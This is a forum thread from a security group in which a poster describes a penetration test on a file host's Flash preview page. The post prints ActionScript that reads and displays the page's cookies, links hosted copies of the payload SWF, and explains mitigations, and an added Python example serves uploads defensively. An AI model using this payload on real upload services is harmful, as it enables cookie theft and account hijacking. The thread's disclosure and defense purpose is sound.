Author Topic: Upload your own XSS  (Read 2256 times)

Offline AnarchyAngel

Upload your own XSS
« on: June 22, 2013, 04:40:19 am »
A while back I was doing a penetration test on a friend's file hosting service application. His service allowed the uploading of Flash files, and when you viewed the file's detail page it showed you a preview of the Flash movie. At the time I knew you could use ActionScript to put JavaScript in a Flash file, but I was not sure if it would have full access to the DOM and allow us to do evil stuff.

I started messing around in actionscript and came up with this:
Code: (actionscript) [Select]
package {
  import flash.display.*;
  import flash.text.*;
  import flash.external.ExternalInterface;
  public class xss extends Sprite {
      public function xss() {
          var cook:TextField = new TextField();
          var res:String = ExternalInterface.call("function(){return document.cookie;}");
          ExternalInterface.call("prompt(document.cookie)");
          cook.multiline = true;
          cook.wordWrap = true;
          cook.autoSize = TextFieldAutoSize.LEFT;
          cook.text = res;
          addChild(cook);
      }
  }
}

After compiling it and uploading, when viewing the preview page I was greeted with a prompt box that had the contents of my cookie for that domain, and it was displayed in text within the Flash embed! So, just like that, we are able to manufacture an XSS vulnerability on an application that is otherwise secure.

There is some protection for this attack. When you embed a Flash file that you don’t trust in a web page, you should add the allowScriptAccess param and set it to none. However, this can be bypassed easily: just go to the swf file itself and it will still execute the JavaScript supplied by our swf file. This means that to be fully protected you will also need to use a mod_rewrite rule to force a download whenever someone tries to view a swf file directly.

Here is one example – http://www.ziddu.com/viewfile/22413513/xss.swf.html

Here is another – http://swfchan.org/2335/xss.swf

OP - https://www.dc414.org/2013/06/upload-your-own-xss/

Staff Note: In the code tag you can select a language for highlighting, I also made it look readable; we like indention. =]
« Last Edit: June 22, 2013, 05:50:10 am by techb »
https://dc414.org - MKE area DEFCON group
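
The two defenses named in the first post (no script access for the embedded movie, forced download on direct requests), as an added example that is not part of the original post or the tested service; it is done here with response headers in a Python WSGI handler rather than a mod_rewrite rule. The function names, the `UPLOADS` store and the sample bytes are constructed; the embed uses `never`, the value Flash Player documents for disabling script access, and the check also looks at the SWF signature bytes so a renamed file is caught, which goes beyond the extension-based rule described above.

```python
# Added example: constructed names and data, not the tested service's code.
import html
import mimetypes

# First three bytes of a SWF: uncompressed, zlib-compressed, LZMA-compressed.
SWF_MAGIC = (b"FWS", b"CWS", b"ZWS")

# Constructed in-memory stand-in for the upload store.
UPLOADS = {
    "xss.swf": b"CWS\x0a" + b"\x00" * 16,
    "holiday.jpg": b"FWS\x09" + b"\x00" * 16,  # SWF behind another extension
    "notes.txt": b"plain text upload",
}

def is_swf(name, head):
    """Flag Flash content by extension or by signature, whichever matches."""
    return name.lower().endswith(".swf") or head[:3] in SWF_MAGIC

def direct_view_headers(name, head):
    """Headers for a direct request; SWF content is never rendered inline."""
    if is_swf(name, head):
        return [("Content-Type", "application/octet-stream"),
                ("Content-Disposition", "attachment"),
                ("X-Content-Type-Options", "nosniff")]
    ctype = mimetypes.guess_type(name)[0] or "application/octet-stream"
    return [("Content-Type", ctype), ("X-Content-Type-Options", "nosniff")]

def preview_embed(url):
    """Preview-page markup: the movie gets no access to the page's script."""
    return ('<object type="application/x-shockwave-flash" data="%s">'
            '<param name="allowScriptAccess" value="never"></object>'
            % html.escape(url, quote=True))

def app(environ, start_response):
    """Minimal WSGI handler serving UPLOADS by the last path segment."""
    name = environ.get("PATH_INFO", "/").rsplit("/", 1)[-1]
    body = UPLOADS.get(name)
    if body is None:
        start_response("404 Not Found", [("Content-Type", "text/plain")])
        return [b"not found"]
    start_response("200 OK", direct_view_headers(name, body[:3]))
    return [body]
```

Serving uploads from a separate origin that holds no session cookies limits what a movie can reach even if one of these headers is missed.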

Offline techb

Re: Upload your own XSS
« Reply #1 on: June 22, 2013, 05:45:52 am »
I like how you explain protecting against the vuln with it. Most people post the harmful stuff and that's it. +1 for you.

Offline Polyphony

Re: Upload your own XSS
« Reply #2 on: June 23, 2013, 05:24:05 pm »
Good stuff, pretty clever makes a quality post dude, I love it!  Thanks for sharing  ;D